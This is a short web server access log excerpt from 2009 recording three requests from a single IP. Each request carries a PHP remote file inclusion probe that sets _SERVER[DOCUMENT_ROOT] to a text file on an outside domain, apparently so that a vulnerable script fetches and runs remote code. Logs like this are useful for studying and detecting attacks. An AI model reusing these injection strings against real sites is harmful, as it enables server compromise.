67.205.103.171 - - [16/Sep/2009:10:03:13 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:03:14 -0700] "GET /logs/access_080615.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:03:18 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
